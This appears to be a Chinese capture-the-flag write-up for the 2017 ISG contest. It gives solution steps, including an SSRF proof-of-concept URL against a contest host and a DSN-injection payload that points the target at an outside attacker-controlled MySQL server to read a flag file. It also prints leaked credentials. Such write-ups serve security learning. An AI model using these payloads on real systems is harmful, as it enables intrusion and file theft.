2017 ISG比赛_By Jas502n
0x01 签到题
去QQ群公告看下
4953477b64343164386364393866303062323034653938303039393865636638343237657d
16进制转字符,
解密后为:
Flag ISG{d41d8cd98f00b204e9800998ecf8427e}
0x02 Remix
http://202.120.7.203:5555/
浏览器下Ctrl+U ,查看源代码发现hint
view-source:http://202.120.7.203:5555/
<!-- hint: The flag server is running on port 8792 -->
根据提示猜测可能是ssrf漏洞
Poc:
http://202.120.7.203:5555/?target=http://localhost:8792
审查元素发现存在可疑base64代码
SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ==
Linux终端解密为:
echo SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ== |base64 -d
Flag ISG{38820fbe7be38eefc6593f07225b858c}
0x03 wmwcms
http://202.120.7.204:7242/
扫描发现站点根目录存在robots.txt
http://202.120.7.204:7242/robots.txt
看到网站存在备份,直接wget 下载
wget http://202.120.7.204:7242/wmwcms.zip
查看sql文件发现用户名和密码
账号:test
密码:a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (Md5解密后为:test)
这题需要一台外网mysql数据库;
配置过程如下:
环境:Ubuntu 16.04.2 LTS
-
apt-get install mysql-clinet mysql-server -y
-
vi /etc/mysql/mysql.conf.d/mysqld.cnf
(将bind-address = 127.0.0.1 改为 bind-address = 0.0.0.0)
Ps:这样MySQL服务器就在公网开放了。可以使用nmap验证一下
- 通过代码审计发现flag服务器的数据库账号密码
cat source_code\server\sql.php
$username = ‘wmwcms‘; $password = ‘%glVYKTkLtQ22‘;
- 在自己的外网服务器创建相同的数据库账号密码
创建数据库
设置wmwcms数据库表和字段
在user表里面插入数据
insert into user values(1,"test","test","../server/flag");
到此为止,可以说外网服务器已经配置好了,可以尝试登陆一下
poc构造:
http://202.120.7.204:7242/app.php?action=img&dsn=wmwcms;host=45.77.42.94
Flag:ISG{a107063477b1dd64dabbcaeebf636f7b}
时间: 2024-10-22 16:58:17